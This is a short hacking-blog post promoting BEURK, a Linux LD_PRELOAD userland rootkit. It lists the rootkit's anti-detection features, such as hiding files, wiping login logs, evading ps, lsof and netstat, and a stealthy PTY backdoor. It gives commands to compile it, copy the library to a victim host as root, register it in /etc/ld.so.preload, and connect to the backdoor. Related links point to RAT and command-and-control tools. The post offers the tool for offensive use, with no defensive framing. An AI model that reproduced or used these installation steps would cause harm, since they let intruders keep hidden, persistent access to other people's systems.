Think, Talk, Hack

BEURK – Experimental Unix RootKit

By root on

BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

Features:

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Usage:

  • Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
  • Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Run
./client.py victim_ip:port # connect with furtive backdoor

BEURK - Experimental Unix RootKitbeurk tutorialdownload beurkhow to use beurkrootkits for linux 2018
Related Posts

Koadic – C3 COM Command & Control – JScript RAT

TrevorC2 – Command and Control via Legitimate Behavior over HTTP

Androspy – Backdoor Crypter & Creator With Automatic IP Poisener